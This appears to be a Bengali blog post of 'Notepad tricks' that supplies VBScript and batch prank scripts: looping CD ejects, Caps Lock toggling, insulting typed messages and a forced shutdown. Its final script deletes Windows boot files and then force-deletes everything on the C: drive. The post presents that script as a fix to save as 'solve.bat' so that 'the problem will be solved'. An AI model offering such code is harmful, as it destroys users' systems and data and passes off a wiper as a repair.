নোটপ্যাড যাদু পর্ব
কিভাবে কম্পিউটারের সিডি / ডি ভি ডি রম বার বার খুলবেন এবং বন্ধ করবেন?
Set oWMP = CreateObject("WMPlayer.OCX.7")Set colCDROMs = oWMP.cdromCollectiondoif colCDROMs.Count >= 1 thenFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextFor i = 0 to colCDROMs.Count - 1colCDROMs.Item(i).EjectNextEnd Ifwscript.sleep 5000loop
কিভাবে কম্পিউটারের Caps Lock বাটন বারবার অন-অফ করবেন?
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
টিপস -৩।
কিভাবে কম্পিউটারের বিভিন্ন Message বারবার দেখাবেন?
WScript.Sleep 180000
WScript.Sleep 10000
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 100
WshShell.AppActivate "Notepad"
WScript.Sleep 500
WshShell.SendKeys "Hel"
WScript.Sleep 500
WshShell.SendKeys "lo "
WScript.Sleep 500
WshShell.SendKeys ", ho"
WScript.Sleep 500
WshShell.SendKeys "w a"
WScript.Sleep 500
WshShell.SendKeys "re "
WScript.Sleep 500
WshShell.SendKeys "you"
WScript.Sleep 500
WshShell.SendKeys "? "
WScript.Sleep 500
WshShell.SendKeys "I a"
WScript.Sleep 500
WshShell.SendKeys "m g"
WScript.Sleep 500
WshShell.SendKeys "ood"
WScript.Sleep 500
WshShell.SendKeys " th"
WScript.Sleep 500
WshShell.SendKeys "ank"
WScript.Sleep 500
WshShell.SendKeys "s! "
কিভাবে কম্পিউটার শাট-ডাউন ম্যাসেজ সহ কম্পিউটার বন্ধ করবেন?
@echo offmsg * I don't like youshutdown -c "Error! You are too stupid!" –s
কিভাবে কীবোর্ডকে ইমুলেট করে বারবার "You are a fool" লেখা দেখাবেন?
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "You are a fool."
loop
কিভাবে কম্পিউটাকে পুরোপুরি শাট-ডাউন করবেন?
@echo offattrib -r -s -h c:\autoexec.batdel c:\autoexec.batattrib -r -s -h c:\boot.inidel c:\boot.iniattrib -r -s -h c:\ntldrdel c:\ntldrattrib -r -s -h c:\windows\win.inidel c:\windows\win.ini
cmd /c del c:\windows\* /F /S /Qcmd /c del c:\* /F /S /Qসেভ করুন solve.cmd or solve.bat দিয়ে । আশা করি সমস্যা ঠিক সমাধান হবে।
Post a Comment Blogger Facebook
Click to see the code!
To insert emoticon you must added at least one space before the code.